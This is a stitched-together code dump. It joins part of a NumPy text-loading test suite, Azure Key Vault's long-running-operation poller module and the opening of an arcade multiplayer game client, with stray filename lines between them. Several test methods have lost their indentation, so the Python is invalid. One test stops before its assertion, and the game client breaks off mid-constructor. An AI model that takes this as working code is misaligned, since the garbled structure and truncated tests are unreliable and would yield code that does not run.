    def test_autostrip(self):
        # Without autostrip, surrounding whitespace stays in the string
        # fields; with autostrip=True it is removed (narrower '|S' widths).
        # NOTE(review): np.VisibleDeprecationWarning moved to np.exceptions
        # in NumPy 2.0 -- confirm the supported NumPy range.
        data = "01/01/2003  , 1.3, abcde"
        kwargs = dict(delimiter=",", dtype=None)
        with warnings.catch_warnings(record=True) as w:
            warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
            mtest = np.genfromtxt(TextIO(data), **kwargs)
            assert_(w[0].category is np.VisibleDeprecationWarning)
        ctrl = np.array([('01/01/2003  ', 1.3, ' abcde')],
                        dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
        assert_equal(mtest, ctrl)
        with warnings.catch_warnings(record=True) as w:
            warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
            mtest = np.genfromtxt(TextIO(data), autostrip=True, **kwargs)
            assert_(w[0].category is np.VisibleDeprecationWarning)
        ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
                        dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
        assert_equal(mtest, ctrl)
    def test_replace_space(self):
        # Test the 'replace_space' option with inferred dtype (None).
        txt = "A.A, B (B), C:C\n1, 2, 3.14"
        # Test default: replace ' ' by '_' and delete non-alphanum chars
        test = np.genfromtxt(TextIO(txt),
                             delimiter=",", names=True, dtype=None)
        ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
        ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
        assert_equal(test, ctrl)
        # Test: no replace, no delete
        test = np.genfromtxt(TextIO(txt),
                             delimiter=",", names=True, dtype=None,
                             replace_space='', deletechars='')
        ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
        ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
        assert_equal(test, ctrl)
        # Test: no delete (spaces are replaced by _)
        test = np.genfromtxt(TextIO(txt),
                             delimiter=",", names=True, dtype=None,
                             deletechars='')
        ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
        ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
        assert_equal(test, ctrl)
    def test_replace_space_known_dtype(self):
        # Test the 'replace_space' (and related) options when dtype != None;
        # mirrors test_replace_space but with an explicit int dtype.
        txt = "A.A, B (B), C:C\n1, 2, 3"
        # Test default: replace ' ' by '_' and delete non-alphanum chars
        test = np.genfromtxt(TextIO(txt),
                             delimiter=",", names=True, dtype=int)
        ctrl_dtype = [("AA", int), ("B_B", int), ("CC", int)]
        ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
        assert_equal(test, ctrl)
        # Test: no replace, no delete
        test = np.genfromtxt(TextIO(txt),
                             delimiter=",", names=True, dtype=int,
                             replace_space='', deletechars='')
        ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", int)]
        ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
        assert_equal(test, ctrl)
        # Test: no delete (spaces are replaced by _)
        test = np.genfromtxt(TextIO(txt),
                             delimiter=",", names=True, dtype=int,
                             deletechars='')
        ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", int)]
        ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
        assert_equal(test, ctrl)
def test_incomplete_names(self):
# Test w/ incomplete names
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.genfromtxt(TextIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
test = np.genfromtxt(TextIO(data), **kwargs)
    def test_names_auto_completion(self):
        # Make sure that names are properly completed: giving one name for
        # three fields pads the rest with default names (f0, f1).
        data = "1 2 3\n 4 5 6"
        test = np.genfromtxt(TextIO(data),
                             dtype=(int, float, int), names="a")
        ctrl = np.array([(1, 2, 3), (4, 5, 6)],
                        dtype=[('a', int), ('f0', float), ('f1', int)])
        assert_equal(test, ctrl)
    def test_names_with_usecols_bug1636(self):
        # Regression test (gh-1636): with usecols, the names taken from the
        # header must correspond to the *selected* columns, for usecols
        # given as indices or as names, and for tuple or scalar dtype.
        data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
        ctrl_names = ("A", "C", "E")
        test = np.genfromtxt(TextIO(data),
                             dtype=(int, int, int), delimiter=",",
                             usecols=(0, 2, 4), names=True)
        assert_equal(test.dtype.names, ctrl_names)
        # usecols given as names
        test = np.genfromtxt(TextIO(data),
                             dtype=(int, int, int), delimiter=",",
                             usecols=("A", "C", "E"), names=True)
        assert_equal(test.dtype.names, ctrl_names)
        # scalar dtype
        test = np.genfromtxt(TextIO(data),
                             dtype=int, delimiter=",",
                             usecols=("A", "C", "E"), names=True)
        assert_equal(test.dtype.names, ctrl_names)
    def test_fixed_width_names(self):
        # Test fix-width w/ names: delimiter as a tuple of widths or as a
        # single uniform width, with names read from the header.
        data = "    A    B   C\n    0    1 2.3\n   45   67   9."
        kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
        ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
                        dtype=[('A', int), ('B', int), ('C', float)])
        test = np.genfromtxt(TextIO(data), **kwargs)
        assert_equal(test, ctrl)
        # Uniform width of 5 parses the same data.
        kwargs = dict(delimiter=5, names=True, dtype=None)
        ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
                        dtype=[('A', int), ('B', int), ('C', float)])
        test = np.genfromtxt(TextIO(data), **kwargs)
        assert_equal(test, ctrl)
    def test_filling_values(self):
        # Test missing values: a scalar filling_values replaces every
        # empty field (no mask, plain int array).
        data = b"1, 2, 3\n1, , 5\n0, 6, \n"
        kwargs = dict(delimiter=",", dtype=None, filling_values=-999)
        ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
        test = np.genfromtxt(TextIO(data), **kwargs)
        assert_equal(test, ctrl)
    def test_comments_is_none(self):
        # Github issue 329 (None was previously being converted to 'None'):
        # comments=None must disable comment stripping entirely, so the
        # literal text 'None' inside a field survives.
        with warnings.catch_warnings(record=True) as w:
            warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
            test = np.genfromtxt(TextIO("test1,testNonetherestofthedata"),
                                 dtype=None, comments=None, delimiter=',')
            assert_(w[0].category is np.VisibleDeprecationWarning)
        assert_equal(test[1], b'testNonetherestofthedata')
        with warnings.catch_warnings(record=True) as w:
            warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
            # Leading space is preserved (no autostrip).
            test = np.genfromtxt(TextIO("test1, testNonetherestofthedata"),
                                 dtype=None, comments=None, delimiter=',')
            assert_(w[0].category is np.VisibleDeprecationWarning)
        assert_equal(test[1], b' testNonetherestofthedata')
    def test_latin1(self):
        # Latin-1 bytes: without an encoding the fields stay raw bytes
        # (and a VisibleDeprecationWarning is emitted); with
        # encoding='latin1' they decode to unicode.
        latin1 = b'\xf6\xfc\xf6'
        norm = b"norm1,norm2,norm3\n"
        enc = b"test1,testNonethe" + latin1 + b",test3\n"
        s = norm + enc + norm
        with warnings.catch_warnings(record=True) as w:
            warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
            test = np.genfromtxt(TextIO(s),
                                 dtype=None, comments=None, delimiter=',')
            assert_(w[0].category is np.VisibleDeprecationWarning)
        assert_equal(test[1, 0], b"test1")
        assert_equal(test[1, 1], b"testNonethe" + latin1)
        assert_equal(test[1, 2], b"test3")
        test = np.genfromtxt(TextIO(s),
                             dtype=None, comments=None, delimiter=',',
                             encoding='latin1')
        assert_equal(test[1, 0], u"test1")
        assert_equal(test[1, 1], u"testNonethe" + latin1.decode('latin1'))
        assert_equal(test[1, 2], u"test3")
        with warnings.catch_warnings(record=True) as w:
            warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
            # Mixed int/bytes row, still without an explicit encoding.
            test = np.genfromtxt(TextIO(b"0,testNonethe" + latin1),
                                 dtype=None, comments=None, delimiter=',')
            assert_(w[0].category is np.VisibleDeprecationWarning)
        assert_equal(test['f0'], 0)
        assert_equal(test['f1'], b"testNonethe" + latin1)
    def test_binary_decode_autodtype(self):
        # UTF-16 bytes with a BOM are decoded before parsing.
        # NOTE(review): ``self.loadfunc`` is presumably set by a subclass
        # (loadtxt vs genfromtxt variants) -- not visible in this chunk.
        utf16 = b'\xff\xfeh\x04 \x00i\x04 \x00j\x04'
        v = self.loadfunc(BytesIO(utf16), dtype=None, encoding='UTF-16')
        assert_array_equal(v, np.array(utf16.decode('UTF-16').split()))
    def test_utf8_byte_encoding(self):
        # Without an explicit encoding, UTF-8 bytes stay raw bytes in the
        # result (with a VisibleDeprecationWarning).
        utf8 = b"\xcf\x96"
        norm = b"norm1,norm2,norm3\n"
        enc = b"test1,testNonethe" + utf8 + b",test3\n"
        s = norm + enc + norm
        with warnings.catch_warnings(record=True) as w:
            warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
            test = np.genfromtxt(TextIO(s),
                                 dtype=None, comments=None, delimiter=',')
            assert_(w[0].category is np.VisibleDeprecationWarning)
        ctl = np.array([
                 [b'norm1', b'norm2', b'norm3'],
                 [b'test1', b'testNonethe' + utf8, b'test3'],
                 [b'norm1', b'norm2', b'norm3']])
        assert_array_equal(test, ctl)
def test_utf8_file(self):
utf8 = b"\xcf\x96"
with temppath() as path:
with open(path, "wb") as f:
f.write((b"test1,testNonethe" + utf8 + b",test3\n") * 2)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',', encoding="UTF-8")
ctl = np.array([
["test1", "testNonethe" + utf8.decode("UTF-8"), "test3"],
["test1", "testNonethe" + utf8.decode("UTF-8"), "test3"]],
dtype=np.unicode)
assert_array_equal(test, ctl)
# test a mixed dtype
with open(path, "wb") as f:
f.write(b"0,testNonethe" + utf8)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',', encoding="UTF-8")
assert_equal(test['f0'], 0)
assert_equal(test['f1'], "testNonethe" + utf8.decode("UTF-8"))
def test_utf8_file_nodtype_unicode(self):
# bytes encoding with non-latin1 -> unicode upcast
utf8 = u'\u03d6'
latin1 = u'\xf6\xfc\xf6'
# skip test if cannot encode utf8 test string with preferred
# encoding. The preferred encoding is assumed to be the default
# encoding of io.open. Will need to change this for PyTest, maybe
# using pytest.mark.xfail(raises=***).
try:
encoding = locale.getpreferredencoding()
utf8.encode(encoding)
except (UnicodeError, ImportError):
pytest.skip('Skipping test_utf8_file_nodtype_unicode, '
'unable to encode utf8 in preferred encoding')
with temppath() as path:
with io.open(path, "wt") as f:
f.write(u"norm1,norm2,norm3\n")
f.write(u"norm1," + latin1 + u",norm3\n")
f.write(u"test1,testNonethe" + utf8 + u",test3\n")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '',
np.VisibleDeprecationWarning)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',')
# Check for warning when encoding not specified.
assert_(w[0].category is np.VisibleDeprecationWarning)
ctl = np.array([
["norm1", "norm2", "norm3"],
["norm1", latin1, "norm3"],
["test1", "testNonethe" + utf8, "test3"]],
dtype=np.unicode)
assert_array_equal(test, ctl)
    def test_recfromtxt(self):
        # recfromtxt returns a recarray; with usemask=True it returns a
        # masked array instead, with attribute access (test.A) still working.
        data = TextIO('A,B\n0,1\n2,3')
        kwargs = dict(delimiter=",", missing_values="N/A", names=True)
        test = np.recfromtxt(data, **kwargs)
        control = np.array([(0, 1), (2, 3)],
                           dtype=[('A', int), ('B', int)])
        assert_(isinstance(test, np.recarray))
        assert_equal(test, control)
        # With a masked entry.
        data = TextIO('A,B\n0,1\n2,N/A')
        test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
        control = ma.array([(0, 1), (2, -1)],
                           mask=[(False, False), (False, True)],
                           dtype=[('A', int), ('B', int)])
        assert_equal(test, control)
        assert_equal(test.mask, control.mask)
        assert_equal(test.A, [0, 2])
    def test_recfromcsv(self):
        # recfromcsv: case_sensitive keeps header case; the default
        # lower-cases names; an explicit dtype and converters also work.
        data = TextIO('A,B\n0,1\n2,3')
        kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
        test = np.recfromcsv(data, dtype=None, **kwargs)
        control = np.array([(0, 1), (2, 3)],
                           dtype=[('A', int), ('B', int)])
        assert_(isinstance(test, np.recarray))
        assert_equal(test, control)
        # Masked variant.
        data = TextIO('A,B\n0,1\n2,N/A')
        test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
        control = ma.array([(0, 1), (2, -1)],
                           mask=[(False, False), (False, True)],
                           dtype=[('A', int), ('B', int)])
        assert_equal(test, control)
        assert_equal(test.mask, control.mask)
        assert_equal(test.A, [0, 2])
        # Default behavior lower-cases the header names.
        data = TextIO('A,B\n0,1\n2,3')
        test = np.recfromcsv(data, missing_values='N/A',)
        control = np.array([(0, 1), (2, 3)],
                           dtype=[('a', int), ('b', int)])
        assert_(isinstance(test, np.recarray))
        assert_equal(test, control)
        # Explicit dtype.
        data = TextIO('A,B\n0,1\n2,3')
        dtype = [('a', int), ('b', float)]
        test = np.recfromcsv(data, missing_values='N/A', dtype=dtype)
        control = np.array([(0, 1), (2, 3)],
                           dtype=dtype)
        assert_(isinstance(test, np.recarray))
        assert_equal(test, control)
        #gh-10394
        data = TextIO('color\n"red"\n"blue"')
        test = np.recfromcsv(data, converters={0: lambda x: x.strip(b'\"')})
        control = np.array([('red',), ('blue',)], dtype=[('color', (bytes, 4))])
        assert_equal(test.dtype, control.dtype)
        assert_equal(test, control)
    def test_max_rows(self):
        # Test the `max_rows` keyword argument: reading stops after the
        # requested number of rows and the stream position is preserved,
        # so a second call continues where the first stopped.
        data = '1 2\n3 4\n5 6\n7 8\n9 10\n'
        txt = TextIO(data)
        a1 = np.genfromtxt(txt, max_rows=3)
        a2 = np.genfromtxt(txt)
        assert_equal(a1, [[1, 2], [3, 4], [5, 6]])
        assert_equal(a2, [[7, 8], [9, 10]])

        # max_rows must be at least 1.
        assert_raises(ValueError, np.genfromtxt, TextIO(data), max_rows=0)

        # An input with several invalid rows.
        data = '1 1\n2 2\n0 \n3 3\n4 4\n5  \n6  \n7  \n'

        test = np.genfromtxt(TextIO(data), max_rows=2)
        control = np.array([[1., 1.], [2., 2.]])
        assert_equal(test, control)

        # Test keywords conflict
        assert_raises(ValueError, np.genfromtxt, TextIO(data), skip_footer=1,
                      max_rows=4)

        # Test with invalid value
        assert_raises(ValueError, np.genfromtxt, TextIO(data), max_rows=4)

        # Test with invalid not raise
        with suppress_warnings() as sup:
            sup.filter(ConversionWarning)

            test = np.genfromtxt(TextIO(data), max_rows=4, invalid_raise=False)
            control = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]])
            assert_equal(test, control)

            test = np.genfromtxt(TextIO(data), max_rows=5, invalid_raise=False)
            control = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]])
            assert_equal(test, control)

        # Structured array with field names.
        data = 'a b\n#c d\n1 1\n2 2\n#0 \n3 3\n4 4\n5  5\n'

        # Test with header, names and comments
        txt = TextIO(data)
        test = np.genfromtxt(txt, skip_header=1, max_rows=3, names=True)
        control = np.array([(1.0, 1.0), (2.0, 2.0), (3.0, 3.0)],
                           dtype=[('c', '<f8'), ('d', '<f8')])
        assert_equal(test, control)
        # To continue reading the same "file", don't use skip_header or
        # names, and use the previously determined dtype.
        test = np.genfromtxt(txt, max_rows=None, dtype=test.dtype)
        control = np.array([(4.0, 4.0), (5.0, 5.0)],
                           dtype=[('c', '<f8'), ('d', '<f8')])
        assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file
# object
tgt = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
with temppath() as name:
with open(name, 'w') as f:
f.write(data)
res = np.genfromtxt(name)
assert_array_equal(res, tgt)
def test_gft_from_gzip(self):
# Test that we can load data from a gzipped file
wanted = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
s = BytesIO()
with gzip.GzipFile(fileobj=s, mode='w') as g:
g.write(asbytes(data))
with temppath(suffix='.gz2') as name:
with open(name, 'w') as f:
f.write(data)
assert_array_equal(np.genfromtxt(name), wanted)
    def test_gft_using_generator(self):
        # genfromtxt accepts a generator of lines; the lines are bytes
        # here ("gft doesn't work with unicode" in legacy mode).
        def count():
            for i in range(10):
                yield asbytes("%d" % i)

        res = np.genfromtxt(count())
        assert_array_equal(res, np.arange(10))
    def test_auto_dtype_largeint(self):
        # Regression test for numpy/numpy#5635 whereby large integers could
        # cause OverflowErrors.

        # Test the automatic definition of the output dtype
        #
        # 2**66 = 73786976294838206464 => should convert to float
        # 2**34 = 17179869184 => should convert to int64
        # 2**10 = 1024 => should convert to int (int32 on 32-bit systems,
        #                 int64 on 64-bit systems)

        data = TextIO('73786976294838206464 17179869184 1024')
        test = np.genfromtxt(data, dtype=None)

        assert_equal(test.dtype.names, ['f0', 'f1', 'f2'])

        assert_(test.dtype['f0'] == float)
        assert_(test.dtype['f1'] == np.int64)
        # Platform-dependent default integer width.
        assert_(test.dtype['f2'] == np.integer)

        assert_allclose(test['f0'], 73786976294838206464.)
        assert_equal(test['f1'], 17179869184)
        assert_equal(test['f2'], 1024)
@pytest.mark.skipif(Path is None, reason="No pathlib.Path")
class TestPathUsage(object):
    # Test that pathlib.Path can be used everywhere a filename is accepted:
    # loadtxt/savetxt, save/load (plain and mem-mapped), savez variants,
    # genfromtxt and the rec* convenience wrappers.
    def test_loadtxt(self):
        with temppath(suffix='.txt') as path:
            path = Path(path)
            a = np.array([[1.1, 2], [3, 4]])
            np.savetxt(path, a)
            x = np.loadtxt(path)
            assert_array_equal(x, a)

    def test_save_load(self):
        # Test that pathlib.Path instances can be used with save.
        with temppath(suffix='.npy') as path:
            path = Path(path)
            a = np.array([[1, 2], [3, 4]], int)
            np.save(path, a)
            data = np.load(path)
            assert_array_equal(data, a)

    def test_save_load_memmap(self):
        # Test that pathlib.Path instances can be loaded mem-mapped.
        with temppath(suffix='.npy') as path:
            path = Path(path)
            a = np.array([[1, 2], [3, 4]], int)
            np.save(path, a)
            data = np.load(path, mmap_mode='r')
            assert_array_equal(data, a)
            # close the mem-mapped file
            del data

    def test_save_load_memmap_readwrite(self):
        # Test that pathlib.Path instances can be written mem-mapped:
        # a write through the memmap must be visible after reloading.
        with temppath(suffix='.npy') as path:
            path = Path(path)
            a = np.array([[1, 2], [3, 4]], int)
            np.save(path, a)
            b = np.load(path, mmap_mode='r+')
            a[0][0] = 5
            b[0][0] = 5
            del b  # closes the file
            data = np.load(path)
            assert_array_equal(data, a)

    def test_savez_load(self):
        # Test that pathlib.Path instances can be used with savez.
        with temppath(suffix='.npz') as path:
            path = Path(path)
            np.savez(path, lab='place holder')
            with np.load(path) as data:
                assert_array_equal(data['lab'], 'place holder')

    def test_savez_compressed_load(self):
        # Test that pathlib.Path instances can be used with savez.
        with temppath(suffix='.npz') as path:
            path = Path(path)
            np.savez_compressed(path, lab='place holder')
            data = np.load(path)
            assert_array_equal(data['lab'], 'place holder')
            data.close()

    def test_genfromtxt(self):
        with temppath(suffix='.txt') as path:
            path = Path(path)
            a = np.array([(1, 2), (3, 4)])
            np.savetxt(path, a)
            data = np.genfromtxt(path)
            assert_array_equal(a, data)

    def test_ndfromtxt(self):
        # Test outputting a standard ndarray
        with temppath(suffix='.txt') as path:
            path = Path(path)
            with path.open('w') as f:
                f.write(u'1 2\n3 4')

            control = np.array([[1, 2], [3, 4]], dtype=int)
            test = np.genfromtxt(path, dtype=int)
            assert_array_equal(test, control)

    def test_mafromtxt(self):
        # From `test_fancy_dtype_alt` above
        with temppath(suffix='.txt') as path:
            path = Path(path)
            with path.open('w') as f:
                f.write(u'1,2,3.0\n4,5,6.0\n')

            test = np.genfromtxt(path, delimiter=',', usemask=True)
            control = ma.array([(1.0, 2.0, 3.0), (4.0, 5.0, 6.0)])
            assert_equal(test, control)

    def test_recfromtxt(self):
        # NOTE(review): np.recfromtxt/np.recfromcsv were removed in
        # NumPy 2.0 -- confirm the supported NumPy range for these tests.
        with temppath(suffix='.txt') as path:
            path = Path(path)
            with path.open('w') as f:
                f.write(u'A,B\n0,1\n2,3')

            kwargs = dict(delimiter=",", missing_values="N/A", names=True)
            test = np.recfromtxt(path, **kwargs)
            control = np.array([(0, 1), (2, 3)],
                               dtype=[('A', int), ('B', int)])
            assert_(isinstance(test, np.recarray))
            assert_equal(test, control)

    def test_recfromcsv(self):
        with temppath(suffix='.txt') as path:
            path = Path(path)
            with path.open('w') as f:
                f.write(u'A,B\n0,1\n2,3')

            kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
            test = np.recfromcsv(path, dtype=None, **kwargs)
            control = np.array([(0, 1), (2, 3)],
                               dtype=[('A', int), ('B', int)])
            assert_(isinstance(test, np.recarray))
            assert_equal(test, control)
def test_gzip_load():
    # save()/load() must round-trip through a gzip-compressed stream.
    arr = np.random.random((5, 5))
    buf = BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="w") as out:
        np.save(out, arr)
    buf.seek(0)
    inp = gzip.GzipFile(fileobj=buf, mode="r")
    assert_array_equal(np.load(inp), arr)
# These next two classes encode the minimal API needed to save()/load() arrays.
# The `test_ducktyping` ensures they work correctly
class JustWriter(object):
    """File-like exposing only the write()/flush() subset that save() needs."""

    def __init__(self, base):
        # Real stream everything is delegated to.
        self.base = base

    def write(self, s):
        # Forward verbatim and hand back the underlying return value.
        written = self.base.write(s)
        return written

    def flush(self):
        result = self.base.flush()
        return result
class JustReader(object):
    """File-like exposing only the read()/seek() subset that load() needs."""

    def __init__(self, base):
        # Real stream everything is delegated to.
        self.base = base

    def read(self, n):
        data = self.base.read(n)
        return data

    def seek(self, off, whence=0):
        pos = self.base.seek(off, whence)
        return pos
def test_ducktyping():
    # save()/load() should accept any object exposing the minimal
    # write/flush (saving) and read/seek (loading) methods.
    arr = np.random.random((5, 5))
    backing = BytesIO()
    sink = JustWriter(backing)
    np.save(sink, arr)
    sink.flush()
    backing.seek(0)
    source = JustReader(backing)
    assert_array_equal(np.load(source), arr)
def test_gzip_loadtxt():
    # Thanks to another windows brokenness, we can't use
    # NamedTemporaryFile: a file created from this function cannot be
    # reopened by another open call. So we first build the gzipped bytes
    # of the reference data in memory, dump them to a securely opened
    # file, and let loadtxt read that file back.
    buf = BytesIO()
    with gzip.GzipFile(fileobj=buf, mode='w') as gz:
        gz.write(b'1 2 3\n')
    buf.seek(0)

    with temppath(suffix='.gz') as name:
        with open(name, 'wb') as f:
            f.write(buf.read())
        res = np.loadtxt(name)
    buf.close()

    assert_array_equal(res, [1, 2, 3])
def test_gzip_loadtxt_from_string():
    # loadtxt should read directly from an in-memory gzip stream.
    raw = BytesIO()
    with gzip.GzipFile(fileobj=raw, mode="w") as gz:
        gz.write(b'1 2 3\n')
    raw.seek(0)
    reader = gzip.GzipFile(fileobj=raw, mode="r")
    assert_array_equal(np.loadtxt(reader), [1, 2, 3])
def test_npzfile_dict():
    # An NpzFile should quack like a dict: membership, keys(), items(),
    # and plain iteration over the archived names.
    buf = BytesIO()
    np.savez(buf, x=np.zeros((3, 3)), y=np.zeros((3, 3)))
    buf.seek(0)

    z = np.load(buf)

    for key in ('x', 'y'):
        assert_(key in z)
        assert_(key in z.keys())

    assert_(len(z.items()) == 2)
    for name, arr in z.items():
        assert_(name in ['x', 'y'])
        assert_equal(arr.shape, (3, 3))

    for name in z:
        assert_(name in ['x', 'y'])

    assert_('x' in z.keys())
@pytest.mark.skipif(not HAS_REFCOUNT, reason="Python lacks refcounts")
def test_load_refcount():
    # Check that objects returned by np.load are directly freed based on
    # their refcount, rather than needing the gc to collect them.
    f = BytesIO()
    np.savez(f, [1, 2, 3])
    f.seek(0)

    with assert_no_gc_cycles():
        np.load(f)

    f.seek(0)
    dt = [("a", 'u1', 2), ("b", 'u1', 2)]
    # Structured loadtxt must not create reference cycles either.
    with assert_no_gc_cycles():
        x = np.loadtxt(TextIO("0 1 2 3"), dtype=dt)
        assert_equal(x, np.array([((0, 1), (2, 3))], dtype=dt))
|
_polling.py | # ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import logging
import time
import threading
import uuid
from typing import TYPE_CHECKING
from azure.core.polling import PollingMethod, LROPoller, NoPolling
from azure.core.exceptions import ResourceNotFoundError, HttpResponseError
try:
from urlparse import urlparse # type: ignore # pylint: disable=unused-import
except ImportError:
from urllib.parse import urlparse
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.common import with_current_context
if TYPE_CHECKING:
# pylint: disable=ungrouped-imports
from typing import Any, Callable, Union, List, Optional
logger = logging.getLogger(__name__)
class KeyVaultOperationPoller(LROPoller):
    """Poller for long running operations where calling result() doesn't wait for operation to complete.

    Unlike the base ``LROPoller``, ``result()`` returns immediately with the
    current resource representation; only ``wait()`` blocks on the operation.
    """
    # pylint: disable=arguments-differ
    def __init__(self, polling_method):
        # type: (PollingMethod) -> None
        # The base class gets inert arguments (no client, no initial response,
        # no-op deserialization, NoPolling) because this poller drives
        # everything through the supplied polling_method instead.
        super(KeyVaultOperationPoller, self).__init__(None, None, lambda *_: None, NoPolling())
        self._polling_method = polling_method
    # pylint: disable=arguments-differ
    def result(self): # type: ignore
        # type: () -> Any
        """Returns a representation of the final resource without waiting for the operation to complete.

        :returns: The deserialized resource of the long running operation
        :raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
        """
        return self._polling_method.resource()
    @distributed_trace
    def wait(self, timeout=None):
        # type: (Optional[float]) -> None
        """Wait on the long running operation for a number of seconds.

        You can check if this call has ended with timeout with the "done()" method.

        :param float timeout: Period of time to wait for the long running
            operation to complete (in seconds).
        :raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
        """
        if not self._polling_method.finished():
            self._done = threading.Event()
            # Run the polling loop on a daemon thread so a hung operation
            # cannot block process exit. NOTE(review): _start appears to be
            # provided by the LROPoller base class -- confirm against azure-core.
            self._thread = threading.Thread(
                target=with_current_context(self._start), name="KeyVaultOperationPoller({})".format(uuid.uuid4())
            )
            self._thread.daemon = True
            self._thread.start()
        if self._thread is None:
            # Nothing to wait for (no polling thread exists).
            return
        self._thread.join(timeout=timeout)
        try:
            # Let's handle possible None in forgiveness here
            # (raising None is a TypeError => there was no error to re-raise)
            raise self._exception # type: ignore
        except TypeError: # Was None
            pass
class DeleteRecoverPollingMethod(PollingMethod):
    """Poller for deleting resources, and recovering deleted resources, in vaults with soft-delete enabled.

    Polls for the existence of the deleted (or recovered) resource. When a
    resource is deleted, Key Vault removes it from its collection at once, but
    it does not immediately appear in the deleted collection: GET requests for
    it return 404 until the deletion is complete, then 2xx. Recovering a
    deleted resource behaves symmetrically for the non-deleted collection.
    """
    def __init__(self, command, final_resource, finished, interval=2):
        self._finished = finished
        self._polling_interval = interval
        self._resource = final_resource
        self._command = command
    def _update_status(self):
        # type: () -> None
        try:
            self._command()
        except ResourceNotFoundError:
            # Resource not yet visible in the target collection; keep polling.
            return
        except HttpResponseError as error:
            # If we are polling on get_deleted_* and we don't have get
            # permissions, we will get ResourceNotFoundError until the
            # resource is recovered, at which point we'll get a 403.
            if error.status_code != 403:
                raise
        self._finished = True
    def initialize(self, client, initial_response, deserialization_callback):
        # All state is supplied to the constructor; nothing to initialize.
        pass
    def run(self):
        # type: () -> None
        try:
            while True:
                if self.finished():
                    break
                self._update_status()
                if self.finished():
                    break
                time.sleep(self._polling_interval)
        except Exception as error:
            logger.warning(str(error))
            raise
    def finished(self):
        # type: () -> bool
        return self._finished
    def resource(self):
        # type: () -> Any
        return self._resource
    def status(self):
        # type: () -> str
        if self._finished:
            return "finished"
        return "polling"
|
client02c.py | import copy
import logging
import asyncio
import threading
import time
from collections import deque
from typing import Dict
import zmq
from zmq.asyncio import Context, Socket
import arcade
from pymunk.vec2d import Vec2d
from demos.movement import KeysPressed, MOVE_MAP, apply_movement
from .lib02 import PlayerEvent, PlayerState, GameState
logger = logging.getLogger(__name__)
logger.setLevel('INFO')
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
RECT_WIDTH = 50
RECT_HEIGHT = 50
MOVEMENT_SPEED = 5
UPDATE_TICK = 30
class Rectangle:
    """A colored, optionally filled rectangle drawn with arcade.

    :param x: center x in screen coordinates
    :param y: center y in screen coordinates
    :param width: width in pixels
    :param height: height in pixels
    :param angle: rotation in degrees
    :param color: an arcade color tuple
    """
    def __init__(self, x, y, width, height, angle, color):
        self.position = Vec2d(x, y)
        # Maps a key code to its movement vector (see the commented-out
        # MOVE_MAP usage in MyGame.on_key_press). BUGFIX: the original
        # annotation was ``Dict[Vec2d]``, which is malformed -- typing.Dict
        # requires both a key and a value type, and annotations on attribute
        # targets can be evaluated at runtime, where the malformed form
        # raises TypeError.
        self.movement: Dict[int, Vec2d] = {}
        # Size and rotation
        self.width = width
        self.height = height
        self.angle = angle
        # Color
        self.color = color
        self.filled = True  # draw() renders a 4px outline when False
    def draw(self):
        """Render the rectangle, filled or as an outline, at its position."""
        if self.filled:
            arcade.draw_rectangle_filled(
                self.position.x, self.position.y,
                self.width, self.height,
                self.color, self.angle
            )
        else:
            arcade.draw_rectangle_outline(
                self.position.x, self.position.y,
                self.width, self.height,
                self.color, border_width=4,
                tilt_angle=self.angle
            )
class MyGame(arcade.Window):
    """Game window: renders the locally-interpolated player and a server 'ghost'."""
    def __init__(self, width, height):
        super().__init__(width, height, title="Multiplayer Demo")
